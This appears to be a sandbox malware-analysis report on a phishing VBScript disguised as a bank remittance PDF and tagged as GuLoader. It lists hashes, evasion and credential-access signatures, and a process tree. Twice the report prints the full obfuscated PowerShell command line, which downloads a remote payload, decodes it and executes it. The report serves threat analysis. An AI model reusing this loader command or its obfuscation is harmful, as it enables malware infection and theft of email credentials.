Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
22/03/2023, 01:13
Static task
static1
Behavioral task
behavioral1
Sample
BBVA REMITANCE PDF.vbs
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
BBVA REMITANCE PDF.vbs
Resource
win10v2004-20230220-en
General
-
Target
BBVA REMITANCE PDF.vbs
-
Size
11KB
-
MD5
a3e1e0656418b73ed6c01a5e81cab3fe
-
SHA1
eaf764c590b1e8bf83c6099025800cb2659c88d1
-
SHA256
7cdead7bbbb2d7719151b78fca01d9edd4811852c14cdf3034926db09afadeff
-
SHA512
88b2218c4d2fc0f377d4d032a281b9570dc121219d573e5a12ced33420dc48dad2528e7b4e39f974ebe6c74155dcebef9818a053312291c2a470ff25f15dbfef
-
SSDEEP
192:UueqaOrAY2CyGlxgL4rMS2octfPVYS/1UTKeZ7AkDnA4m0H:UbqayAPbGlxg0rWtHSS/1U/tAknH
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 2 4100 WScript.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ExtExport.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook ExtExport.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook ExtExport.exe Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook ExtExport.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 480 ExtExport.exe 480 ExtExport.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4948 powershell.exe 480 ExtExport.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4948 set thread context of 480 4948 powershell.exe 124 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3968 powershell.exe 3968 powershell.exe 4948 powershell.exe 4948 powershell.exe -
Suspicious behavior: MapViewOfSection 22 IoCs
pid Process 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe 4948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3968 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 480 ExtExport.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4100 wrote to memory of 3968 4100 WScript.exe 84 PID 4100 wrote to memory of 3968 4100 WScript.exe 84 PID 3968 wrote to memory of 4948 3968 powershell.exe 86 PID 3968 wrote to memory of 4948 3968 powershell.exe 86 PID 3968 wrote to memory of 4948 3968 powershell.exe 86 PID 4948 wrote to memory of 4484 4948 powershell.exe 103 PID 4948 wrote to memory of 4484 4948 powershell.exe 103 PID 4948 wrote to memory of 4484 4948 powershell.exe 103 PID 4948 wrote to memory of 4088 4948 powershell.exe 104 PID 4948 wrote to memory of 4088 4948 powershell.exe 104 PID 4948 wrote to memory of 4088 4948 powershell.exe 104 PID 4948 wrote to memory of 4992 4948 powershell.exe 105 PID 4948 wrote to memory of 4992 4948 powershell.exe 105 PID 4948 wrote to memory of 4992 4948 powershell.exe 105 PID 4948 wrote to memory of 4356 4948 powershell.exe 106 PID 4948 wrote to memory of 4356 4948 powershell.exe 106 PID 4948 wrote to memory of 4356 4948 powershell.exe 106 PID 4948 wrote to memory of 1176 4948 powershell.exe 107 PID 4948 wrote to memory of 1176 4948 powershell.exe 107 PID 4948 wrote to memory of 1176 4948 powershell.exe 107 PID 4948 wrote to memory of 2864 4948 powershell.exe 108 PID 4948 wrote to memory of 2864 4948 powershell.exe 108 PID 4948 wrote to memory of 2864 4948 powershell.exe 108 PID 4948 wrote to memory of 2136 4948 powershell.exe 109 PID 4948 wrote to memory of 2136 4948 powershell.exe 109 PID 4948 wrote to memory of 2136 4948 powershell.exe 109 PID 4948 wrote to memory of 780 4948 powershell.exe 110 PID 4948 wrote to memory of 780 4948 powershell.exe 110 PID 4948 wrote to memory of 780 4948 powershell.exe 110 PID 4948 wrote to memory of 3692 4948 powershell.exe 111 PID 4948 wrote to memory of 3692 4948 powershell.exe 111 PID 4948 wrote to memory of 3692 4948 powershell.exe 111 PID 4948 wrote to memory of 3620 4948 powershell.exe 112 PID 4948 wrote to memory of 3620 4948 powershell.exe 112 PID 4948 wrote to memory of 3620 4948 powershell.exe 112 PID 4948 wrote to memory of 4644 4948 powershell.exe 113 PID 4948 wrote to memory of 4644 4948 powershell.exe 113 PID 4948 wrote to memory of 4644 4948 powershell.exe 113 PID 4948 wrote to memory of 1520 4948 powershell.exe 114 PID 4948 wrote to memory of 1520 4948 powershell.exe 114 PID 4948 wrote to memory of 1520 4948 powershell.exe 114 PID 4948 wrote to memory of 4588 4948 powershell.exe 115 PID 4948 wrote to memory of 4588 4948 powershell.exe 115 PID 4948 wrote to memory of 4588 4948 powershell.exe 115 PID 4948 wrote to memory of 3216 4948 powershell.exe 116 PID 4948 wrote to memory of 3216 4948 powershell.exe 116 PID 4948 wrote to memory of 3216 4948 powershell.exe 116 PID 4948 wrote to memory of 3236 4948 powershell.exe 117 PID 4948 wrote to memory of 3236 4948 powershell.exe 117 PID 4948 wrote to memory of 3236 4948 powershell.exe 117 PID 4948 wrote to memory of 2936 4948 powershell.exe 118 PID 4948 wrote to memory of 2936 4948 powershell.exe 118 PID 4948 wrote to memory of 2936 4948 powershell.exe 118 PID 4948 wrote to memory of 4224 4948 powershell.exe 119 PID 4948 wrote to memory of 4224 4948 powershell.exe 119 PID 4948 wrote to memory of 4224 4948 powershell.exe 119 PID 4948 wrote to memory of 3496 4948 powershell.exe 120 PID 4948 wrote to memory of 3496 4948 powershell.exe 120 PID 4948 wrote to memory of 3496 4948 powershell.exe 120 PID 4948 wrote to memory of 3508 4948 powershell.exe 121 PID 4948 wrote to memory of 3508 4948 powershell.exe 121 PID 4948 wrote to memory of 3508 4948 powershell.exe 121 PID 4948 wrote to memory of 4768 4948 powershell.exe 122 PID 4948 wrote to memory of 4768 4948 powershell.exe 122 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook ExtExport.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook ExtExport.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BBVA REMITANCE PDF.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function bonapar9 ([String]$Quaeoml){For($yohim=1; $yohim -lt $Quaeoml.Length-1; $yohim+=(1+1)){$Statsman=$Statsman+$Quaeoml.Substring($yohim, 1)};$Statsman;}$nemm=bonapar9 'Zh tUt pAsH: /I/OvSi c t oAr iSa mCePdAiPc .GcToHmB/ HSoArSs eHk e eTp eF.huT3A2T ';$Statsman01=bonapar9 'Di e xS ';$cente = bonapar9 ' \ sQy s wFo wg6H4 \ W iSnNdDoCw s PSo wSeAr SShVeSl lA\Sv 1U.O0C\ pBodwCe rPs hheFl l .neExReS ';.($Statsman01) (bonapar9 'P$PMMePt opdBiLk sS2 = $Te nCvB:TwLiDnBd iRr ') ;.($Statsman01) (bonapar9 'T$ cSeOnGt eA=W$BMGeStIoTd iAk sF2 +H$ c eSnAtBeP ') ;.($Statsman01) (bonapar9 'D$fU nWa bMaBsk =L S( (DgSwUmRiR rw iUnp3 2 _ p rNo cSe sSs P-SFI OPKrCoWcYe s s I d =D$Y{UPPIODS} )b.VCKoSmSm aVn dTLMiAn e )K K-Os pHlSiOt C[AcKh a rJ] 3 4 ');.($Statsman01) (bonapar9 ' $DSMpViUrmlTi ePhMyN =P $AU nia bPa sS[R$ USn a b aMsE.Ac o uIn tG- 2F]N ');.($Statsman01) (bonapar9 'C$PASpTo gfeTi cSaL=C(ATFeFs tC-UPTaKtAhI $CcDe nMt e )N S- ABn dS S( [ ICnAtKP t rH]M: :UsKiTzVeM f-BeGq G8C) ') ;if ($Apogeica) {.$cente $Spirliehy;} else {;$Statsman00=bonapar9 'USJtSaRrSt -PBEi t sPT r a nBsCf eSrV F- S oSu r cSe M$ nHe m mR F-VD eFs tBi n aStiiSo n $EM e tFo d i k sF2O ';.($Statsman01) (bonapar9 ' $ M eGt oRd i kHs 2B= $ eSn v : a p p dPaCtPaF ') ;.($Statsman01) (bonapar9 'PIImWpPoVr t - Mlo dAuSlPe SBii t s T r aRn smfLe r ') ;$Metodiks2=$Metodiks2+'\Bramsh.Ris';while (-not $Swel) {.($Statsman01) (bonapar9 'S$KSAwSe l = ( T e sFt -EPOajt hS $ M e t oSdLiOk sF2S) ') ;.($Statsman01) $Statsman00;.($Statsman01) (bonapar9 'PSSt aPr t - S l eSe pO R5 ');}.($Statsman01) (bonapar9 'P$ bGoSn a pPamr =H HG ePt -AC o n t e nFtA T$HM eDtVo d i kAsS2S ');.($Statsman01) (bonapar9 ' $ GNrUaVvUr u C= p[CS y sbtAeDm .SC o ndv eHr tP] : :LFPrGo maBNaFs eC6I4 S t rPiDn gA( $Eb orn a pBa r )T ');.($Statsman01) (bonapar9 ' $ SPt a t s m a nD2Z =C [rS yHsFtFe m . T e xStT.SE nMcHo d iSnVg ]D: : AKSRCII I .uGEeEtRSTtTrSiTn g (B$CGGrUa v r u )D ');.($Statsman01) (bonapar9 ' $TR e sOcTr aStNc hTpC=D$ SBt act s mCaInT2A.DsLuEbLs tsrsi nTg (Q1 8H1L7S6L4 , 1 9J6 1 6 )U ');.($Statsman01) $Rescratchp;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function bonapar9 ([String]$Quaeoml){For($yohim=1; $yohim -lt $Quaeoml.Length-1; $yohim+=(1+1)){$Statsman=$Statsman+$Quaeoml.Substring($yohim, 1)};$Statsman;}$nemm=bonapar9 'Zh tUt pAsH: /I/OvSi c t oAr iSa mCePdAiPc .GcToHmB/ HSoArSs eHk e eTp eF.huT3A2T ';$Statsman01=bonapar9 'Di e xS ';$cente = bonapar9 ' \ sQy s wFo wg6H4 \ W iSnNdDoCw s PSo wSeAr SShVeSl lA\Sv 1U.O0C\ pBodwCe rPs hheFl l .neExReS ';.($Statsman01) (bonapar9 'P$PMMePt opdBiLk sS2 = $Te nCvB:TwLiDnBd iRr ') ;.($Statsman01) (bonapar9 'T$ cSeOnGt eA=W$BMGeStIoTd iAk sF2 +H$ c eSnAtBeP ') ;.($Statsman01) (bonapar9 'D$fU nWa bMaBsk =L S( (DgSwUmRiR rw iUnp3 2 _ p rNo cSe sSs P-SFI OPKrCoWcYe s s I d =D$Y{UPPIODS} )b.VCKoSmSm aVn dTLMiAn e )K K-Os pHlSiOt C[AcKh a rJ] 3 4 ');.($Statsman01) (bonapar9 ' $DSMpViUrmlTi ePhMyN =P $AU nia bPa sS[R$ USn a b aMsE.Ac o uIn tG- 2F]N ');.($Statsman01) (bonapar9 'C$PASpTo gfeTi cSaL=C(ATFeFs tC-UPTaKtAhI $CcDe nMt e )N S- ABn dS S( [ ICnAtKP t rH]M: :UsKiTzVeM f-BeGq G8C) ') ;if ($Apogeica) {.$cente $Spirliehy;} else {;$Statsman00=bonapar9 'USJtSaRrSt -PBEi t sPT r a nBsCf eSrV F- S oSu r cSe M$ nHe m mR F-VD eFs tBi n aStiiSo n $EM e tFo d i k sF2O ';.($Statsman01) (bonapar9 ' $ M eGt oRd i kHs 2B= $ eSn v : a p p dPaCtPaF ') ;.($Statsman01) (bonapar9 'PIImWpPoVr t - Mlo dAuSlPe SBii t s T r aRn smfLe r ') ;$Metodiks2=$Metodiks2+'\Bramsh.Ris';while (-not $Swel) {.($Statsman01) (bonapar9 'S$KSAwSe l = ( T e sFt -EPOajt hS $ M e t oSdLiOk sF2S) ') ;.($Statsman01) $Statsman00;.($Statsman01) (bonapar9 'PSSt aPr t - S l eSe pO R5 ');}.($Statsman01) (bonapar9 'P$ bGoSn a pPamr =H HG ePt -AC o n t e nFtA T$HM eDtVo d i kAsS2S ');.($Statsman01) (bonapar9 ' $ GNrUaVvUr u C= p[CS y sbtAeDm .SC o ndv eHr tP] : :LFPrGo maBNaFs eC6I4 S t rPiDn gA( $Eb orn a pBa r )T ');.($Statsman01) (bonapar9 ' $ SPt a t s m a nD2Z =C [rS yHsFtFe m . T e xStT.SE nMcHo d iSnVg ]D: : AKSRCII I .uGEeEtRSTtTrSiTn g (B$CGGrUa v r u )D ');.($Statsman01) (bonapar9 ' $TR e sOcTr aStNc hTpC=D$ SBt act s mCaInT2A.DsLuEbLs tsrsi nTg (Q1 8H1L7S6L4 , 1 9J6 1 6 )U ');.($Statsman01) $Rescratchp;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:4484
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:4088
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:4992
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:4356
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:1176
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:2864
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:2136
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:780
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:3692
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:3620
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵PID:4644
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:1520
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:4588
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:3216
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:3236
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:2936
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:4224
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:3496
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:3508
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:4768
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵PID:1364
-
-
C:\Program Files (x86)\internet explorer\ExtExport.exe"C:\Program Files (x86)\internet explorer\ExtExport.exe"4⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:480
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1013461898-3711306144-4198452673-1000\0f5007522459c86e95ffcc62f32308f1_378e8bf1-7517-4d84-8459-4934a33614da
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1013461898-3711306144-4198452673-1000\0f5007522459c86e95ffcc62f32308f1_378e8bf1-7517-4d84-8459-4934a33614da
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61